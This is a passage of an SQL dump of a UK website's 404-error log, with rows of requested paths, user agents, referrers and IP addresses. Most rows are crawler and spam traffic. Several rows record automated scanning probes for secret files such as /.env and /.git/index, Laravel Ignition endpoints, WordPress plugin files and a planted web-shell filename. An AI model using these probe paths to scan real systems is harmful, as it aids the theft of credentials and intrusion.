17:18:12','/aclssqif2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37544,'2023-01-27 18:07:00','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.70.251'),(37545,'2023-01-27 18:25:35','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3970 Safari/537.36 Edg/79.0.143.5','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37546,'2023-01-27 19:33:48','/glamour_models/fly-dannii/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/fly-dannii/',404,'GET',NULL,'167.235.225.241'),(37547,'2023-01-27 19:44:48','/adult-web-cams/mature-web-cams.htm','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36','http://www.dailyjolly.co.uk/adult-web-cams/mature-web-cams.htm',404,'GET',NULL,'83.53.132.126'),(37548,'2023-01-27 19:52:24','/iyopx9ce2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37549,'2023-01-27 20:17:41','/advice/caret20','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37550,'2023-01-27 20:24:00','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/103.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37551,'2023-01-27 20:38:02','/glamour_models/big-boob-strip-tease/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/big-boob-strip-tease/',404,'GET',NULL,'78.47.20.143'),(37552,'2023-01-27 20:44:06','/are-you-going-to-a-festival-in-the-summer-of-2018-read-our-tips-today','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)','http://www.dailyjolly.co.uk/are-you-going-to-a-festival-in-the-summer-of-2018-read-our-tips-today',404,'GET',NULL,'85.208.98.22'),(37553,'2023-01-27 20:44:45','/are-you-going-to-a-festival-in-the-summer-of-2018-read-our-tips-today','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)','http://www.dailyjolly.co.uk/are-you-going-to-a-festival-in-the-summer-of-2018-read-our-tips-today#respond',404,'GET',NULL,'85.208.98.16'),(37554,'2023-01-27 20:46:42','/are-you-going-to-a-festival-in-the-summer-of-2018-read-our-tips-today','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)','http://www.dailyjolly.co.uk/are-you-going-to-a-festival-in-the-summer-of-2018-read-our-tips-today#content',404,'GET',NULL,'85.208.98.20'),(37555,'2023-01-27 20:46:52','/are-you-going-to-a-festival-in-the-summer-of-2018-read-our-tips-today','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)',NULL,404,'GET',NULL,'85.208.98.29'),(37556,'2023-01-27 20:47:11','/are-you-going-to-a-festival-in-the-summer-of-2018-read-our-tips-today','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)','http://www.dailyjolly.co.uk/are-you-going-to-a-festival-in-the-summer-of-2018-read-our-tips-today',404,'GET',NULL,'85.208.98.31'),(37557,'2023-01-27 22:13:58','/discussing-plastics-with-jacob','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; Daum/4.1; +http://cs.daum.net/faq/15/4118.html?faqId=28966)',NULL,404,'GET',NULL,'211.249.246.102'),(37558,'2023-01-27 22:14:36','/wear-and-care-for-your-wardrobe','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; Daum/4.1; +http://cs.daum.net/faq/15/4118.html?faqId=28966)',NULL,404,'GET',NULL,'211.249.246.102'),(37559,'2023-01-27 22:52:56','/.env','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36','https://dailyjolly.co.uk/.env',404,'GET',NULL,'79.124.49.14'),(37560,'2023-01-27 23:07:41','/glamour_models/kinky-brunette/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/kinky-brunette/',404,'GET',NULL,'88.99.39.188'),(37561,'2023-01-27 23:11:58','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37562,'2023-01-27 23:40:34','/glamour_models/demi-scott-strip-tease/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/demi-scott-strip-tease/',404,'GET',NULL,'188.34.165.82'),(37563,'2023-01-27 23:47:03','/advice/body18','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37564,'2023-01-27 23:49:55','/regal-cinema','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.101 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.76.53'),(37565,'2023-01-28 00:11:05','/advice/uncess3','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37566,'2023-01-28 01:01:41','/glamour_models/sexy-blonde-strip-tease/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/sexy-blonde-strip-tease/',404,'GET',NULL,'49.12.187.66'),(37567,'2023-01-28 01:06:07','/page/5','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64; trendictionbot0.5.0; trendiction search; http://www.trendiction.de/bot; please let us know of any problems; web at trendiction.com) Gecko/20170101 Firefox/67.0',NULL,404,'GET',NULL,'144.76.22.15'),(37568,'2023-01-28 01:11:12','/blog','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36',NULL,404,'GET',NULL,'62.204.41.33'),(37569,'2023-01-28 01:27:32','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/102.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37570,'2023-01-28 02:14:03','/.git/index','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0',NULL,404,'GET',NULL,'79.120.76.144'),(37571,'2023-01-28 02:19:45','/faq/spitef15','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37572,'2023-01-28 02:38:42','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37573,'2023-01-28 02:40:11','/attuning/kc99fxaf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37574,'2023-01-28 02:43:09','/.env','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36','http://www.dailyjolly.co.uk/.env',404,'GET',NULL,'79.124.49.14'),(37575,'2023-01-28 02:44:20','/glamour_models/lady-gone-bad/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/lady-gone-bad/',404,'GET',NULL,'167.235.237.148'),(37576,'2023-01-28 02:57:30','/glamour_models/sexy-girl-next-door/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/sexy-girl-next-door/',404,'GET',NULL,'23.88.32.60'),(37577,'2023-01-28 03:03:04','/are-you-training-for-the-blue-mile-check-out-our-tips','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'87.250.224.89'),(37578,'2023-01-28 03:28:50','/our-ingredients','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'213.180.203.87'),(37579,'2023-01-28 03:45:31','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,404,'GET',NULL,'44.210.104.199'),(37580,'2023-01-28 03:45:33','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,404,'GET',NULL,'44.210.104.199'),(37581,'2023-01-28 03:45:34','/app-ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,404,'GET',NULL,'44.210.104.199'),(37582,'2023-01-28 03:45:35','/app-ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,404,'GET',NULL,'44.210.104.199'),(37583,'2023-01-28 04:03:42','/glamour_models/dressed-to-thrill/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/dressed-to-thrill/',404,'GET',NULL,'138.201.118.40'),(37584,'2023-01-28 04:29:04','/uk/saudi-arabia','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'5.255.253.143'),(37585,'2023-01-28 04:40:03','/advice/igneou0','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37586,'2023-01-28 05:05:01','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:71.0) Gecko/20100101 Firefox/71.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37587,'2023-01-28 05:18:55','/wp-content/plugins/scripts-organizer/admin/js/admin.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',NULL,404,'GET',NULL,'185.196.220.26'),(37588,'2023-01-28 05:21:54','/resubjection/aumdzk8f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37589,'2023-01-28 06:48:21','/are-you-training-for-the-blue-mile-check-out-our-tips','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.101 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.76.55'),(37590,'2023-01-28 06:59:27','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37591,'2023-01-28 07:17:39','/advice/assona14','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37592,'2023-01-28 07:45:42','/glamour_models/mature-tease/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/mature-tease/',404,'GET',NULL,'142.132.188.179'),(37593,'2023-01-28 08:23:01','/articles/blue-mile/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.101 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.76.53'),(37594,'2023-01-28 08:32:10','/sellers.json','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,404,'GET',NULL,'44.192.64.191'),(37595,'2023-01-28 08:32:11','/sellers.json','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,404,'GET',NULL,'44.192.64.191'),(37596,'2023-01-28 08:48:12','/glamour_models/lesbian-booty/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/lesbian-booty/',404,'GET',NULL,'167.235.237.148'),(37597,'2023-01-28 08:50:27','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37598,'2023-01-28 10:28:20','/e/data/js/ajax.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',NULL,404,'GET',NULL,'146.148.160.146'),(37599,'2023-01-28 10:47:28','/glamour_models/the-unfaithful-wife/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/the-unfaithful-wife/',404,'GET',NULL,'23.88.45.178'),(37600,'2023-01-28 11:17:01','/fredstole/a24hwj4e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37601,'2023-01-28 11:25:33','/governance/w163tq6e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37602,'2023-01-28 11:48:25','/akmkrsde2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37603,'2023-01-28 12:16:00','/_ignition/health-check/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','https://dailyjolly.co.uk/_ignition/health-check/',404,'GET',NULL,'147.78.47.249'),(37604,'2023-01-28 12:16:03','/public/_ignition/health-check/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','https://dailyjolly.co.uk/public/_ignition/health-check/',404,'GET',NULL,'147.78.47.249'),(37605,'2023-01-28 12:29:14','/michelle_thorne/index.html','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/michelle_thorne/index.html',404,'GET',NULL,'167.235.200.190'),(37606,'2023-01-28 12:31:57','/advice/dermat19','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37607,'2023-01-28 12:52:20','/superstructure/9f3ncjae2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37608,'2023-01-28 13:01:03','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0.4 Mobile/15E148 Safari/604.1','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37609,'2023-01-28 13:15:21','/iejyrqif2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37610,'2023-01-28 13:25:59','/advice/hoy9','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37611,'2023-01-28 13:39:15','/wp-content/plugins/secure-file-manager/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',NULL,404,'GET',NULL,'185.196.220.26'),(37612,'2023-01-28 13:54:13','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:103.0) Gecko/20100101 Firefox/101.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37613,'2023-01-28 14:23:28','/ieudss2h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37614,'2023-01-28 15:02:02','/advice/median23','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37615,'2023-01-28 15:04:41','/hasheesh/tko09gbe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37616,'2023-01-28 15:37:24','/ads.txt','https://www.dailyjolly.co.uk','Google-adstxt',NULL,404,'GET',NULL,'66.249.65.127'),(37617,'2023-01-28 16:17:06','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37618,'2023-01-28 16:50:16','/glamour_models/karlie-simon/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/karlie-simon/',404,'GET',NULL,'188.34.165.82'),(37619,'2023-01-28 16:50:36','/tvad8zbg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37620,'2023-01-28 17:00:32','/upload/fw','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36',NULL,404,'GET',NULL,'103.137.204.51'),(37621,'2023-01-28 17:15:19','/glamour_models/abigail-toyne/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/abigail-toyne/',404,'GET',NULL,'162.55.40.124'),(37622,'2023-01-28 17:37:20','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.65.123'),(37623,'2023-01-28 18:16:35','/tsgyiv6e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37624,'2023-01-28 18:19:06','/advice/illfav16','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37625,'2023-01-28 18:27:05','/advice/moolle1','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37626,'2023-01-28 18:57:34','/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php%20=%20%3E%3E%20shell%20no%20work','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)',NULL,404,'GET',NULL,'172.174.224.29'),(37627,'2023-01-28 18:57:35','/wp-admin/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php%20=%20%3E%3E%20shell%20no%20work','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)',NULL,404,'GET',NULL,'172.174.224.29'),(37628,'2023-01-28 18:57:35','/wp-content/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php%20=%20%3E%3E%20shell%20no%20work','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)',NULL,404,'GET',NULL,'172.174.224.29'),(37629,'2023-01-28 19:21:08','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37630,'2023-01-28 19:32:54','/glamour_models/vicky-powell/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/vicky-powell/',404,'GET',NULL,'167.235.225.241'),(37631,'2023-01-28 20:05:43','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.3292.140 Safari/537.36 Edge/18.18761','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37632,'2023-01-28 20:14:45','/matelasse/dhhvi0pg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37633,'2023-01-28 20:42:08','/isqpmpee2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37634,'2023-01-28 20:46:07','/js/duilian.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)','http://www.dailyjolly.co.uk/js/duilian.js',404,'GET',NULL,'36.99.152.194'),(37635,'2023-01-28 20:57:56','/answers-ente.html?c=70sull','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37636,'2023-01-28 21:17:17','/urban_design/7method.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37637,'2023-01-28 21:38:28','/glamour_models/black-babe-in-stockings/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/black-babe-in-stockings/',404,'GET',NULL,'167.235.239.212'),(37638,'2023-01-28 21:47:36','/isw89f3e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37639,'2023-01-28 